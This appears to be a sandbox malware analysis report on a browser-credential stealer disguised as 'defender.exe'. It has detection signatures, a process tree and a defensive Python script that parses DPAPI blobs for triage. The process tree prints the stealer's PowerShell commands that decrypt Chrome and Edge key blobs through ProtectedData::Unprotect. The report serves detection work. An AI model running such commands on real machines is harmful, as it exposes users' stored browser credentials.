Analysis Report
General Information
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Icon mismatch, binary includes an icon from a different legit application in order to fool users
AI detected suspicious sample
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
- System is w10x64
- SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe" MD5: A4590450863F13AA67198EC0FE52453E)
- defender.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe MD5: 050F6E0968C055E912AB6CA8DC12A881)
- cmd.exe (PID: 3496 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7200 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7308 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7340 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7612 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- defender.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1892,i,7391301622975608385,14743312254782703774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
- defender.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2140 --field-trial-handle=1892,i,7391301622975608385,14743312254782703774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- defender.exe (PID: 7980 cmdline: "C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722778035040302 --launch-time-ticks=4063477079 --mojo-platform-channel-handle=2348 --field-trial-handle=1892,i,7391301622975608385,14743312254782703774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- defender.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1432 --field-trial-handle=1892,i,7391301622975608385,14743312254782703774,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- cleanup
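The two powershell.exe invocations in the tree (PIDs 7340 and 7612) are the browser-credential step behind the "Tries to harvest and steal browser information" signature: each hands a DPAPI blob to ProtectedData::Unprotect with scope 'CurrentUser', so Windows decrypts it for the stealer under the victim's own logon session, no elevation needed. The blob layout is readable straight from the byte arrays: version 1, the fixed DPAPI provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb, a master-key GUID, then a length-prefixed UTF-16 description that decodes to "Google Chrome" (71,0,111,0,111,0,103,0,...) in the first call and "Edge" (69,0,100,0,103,0,101,0) in the second, AES-256 and SHA-512 algorithm IDs, and a 48-byte ciphertext. The Python below is an added example, not code from the sample, the sandbox or the rule author: it extracts the `[byte[]]@(...)` literal from such a command line and parses the public DPAPI blob layout, so triage can name the targeted application without ever calling DPAPI. The command line it runs against is constructed here from a blob assembled by build_blob(); its master-key GUID, salts and ciphertext are placeholders, not the report's values.

```python
"""Triage a PowerShell ProtectedData::Unprotect call found in a process command line.

Added example for this report; not code from the sample or the sandbox vendor.
Parses the DPAPI blob layout (version, provider GUID, master-key GUID, flags,
description, crypt/hash algorithms, salt, HMAC key, ciphertext, signature).
"""
import re
import struct
import uuid

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # present in every DPAPI blob
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES", 0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}
BYTE_ARRAY_RE = re.compile(r"\[byte\[\]\]@\(([0-9,\s]+)\)")
UNPROTECT_RE = re.compile(r"ProtectedData\]::Unprotect", re.IGNORECASE)

# Constructed placeholder, not the master-key GUID from the report's blobs.
MASTER_KEY = uuid.UUID("11111111-2222-3333-4444-555555555555")


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk a DPAPI blob and return its header fields; ValueError on malformed input."""
    off = 0

    def u32() -> int:
        nonlocal off
        if off + 4 > len(blob):
            raise ValueError("truncated blob")
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(blob):
            raise ValueError("truncated blob")
        chunk = blob[off:off + n]
        off += n
        return chunk

    version = u32()
    provider = uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    u32()                                           # master-key version, always 1
    master_key = uuid.UUID(bytes_le=take(16))
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, _crypt_bits = u32(), u32()
    salt = take(u32())
    take(u32())                                     # strong-password HMAC key, normally empty
    alg_hash, _hash_bits = u32(), u32()
    take(u32())                                     # HMAC2 key
    data = take(u32())
    sign = take(u32())
    if off != len(blob):
        raise ValueError("trailing bytes after signature")
    return {
        "master_key_guid": str(master_key),
        "flags": flags,
        "description": description,
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "salt_len": len(salt),
        "ciphertext_len": len(data),
        "sign_len": len(sign),
    }


def triage_cmdline(cmdline: str) -> list:
    """One finding per [byte[]]@(...) literal passed to an Unprotect call; [] if none."""
    if not UNPROTECT_RE.search(cmdline):
        return []
    findings = []
    for m in BYTE_ARRAY_RE.finditer(cmdline):
        try:
            blob = bytes(int(x) for x in re.findall(r"\d+", m.group(1)))
            findings.append(parse_dpapi_blob(blob))
        except ValueError as err:                   # out-of-range byte or malformed blob
            findings.append({"error": str(err)})
    return findings


def build_blob(description: str, ciphertext: bytes, master_key: uuid.UUID) -> bytes:
    """Assemble a syntactically valid DPAPI blob from constructed test data (not a real key)."""
    desc = (description + "\x00").encode("utf-16-le")
    salt, hmac2, sign = b"\x11" * 32, b"\x22" * 32, b"\x33" * 64
    return b"".join([
        struct.pack("<I", 1), DPAPI_PROVIDER.bytes_le,
        struct.pack("<I", 1), master_key.bytes_le,
        struct.pack("<I", 0x10),                        # CRYPTPROTECT_AUDIT
        struct.pack("<I", len(desc)), desc,
        struct.pack("<II", 0x6610, 256),                # CALG_AES_256, 256-bit
        struct.pack("<I", len(salt)), salt,
        struct.pack("<I", 0),                           # no strong-password key
        struct.pack("<II", 0x800E, 512),                # CALG_SHA_512
        struct.pack("<I", len(hmac2)), hmac2,
        struct.pack("<I", len(ciphertext)), ciphertext,
        struct.pack("<I", len(sign)), sign,
    ])


def sample_cmdline() -> str:
    """Constructed cmd.exe/powershell.exe line with the same shape as the report's."""
    array = ",".join(str(b) for b in build_blob("Google Chrome", b"\xaa" * 48, MASTER_KEY))
    return ('C:\\Windows\\system32\\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName '
            'System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect('
            f"[byte[]]@({array}), $null, 'CurrentUser')\"")


if __name__ == "__main__":
    for finding in triage_cmdline(sample_cmdline()):
        print(finding)
```

Run triage_cmdline over the cmdline field of each process in the tree: the description is the cheapest indicator of which credential store is being opened, the master-key GUID ties the call to one user's DPAPI master key, and a 48-byte AES-CBC ciphertext is consistent with a padded 32-byte key rather than a password record. A literal that fails to parse is itself worth a second look, since ProtectedData::Unprotect on a hand-built byte array has no legitimate interactive use.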
No configs have been found
No yara matches
System Summary
Source: Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements):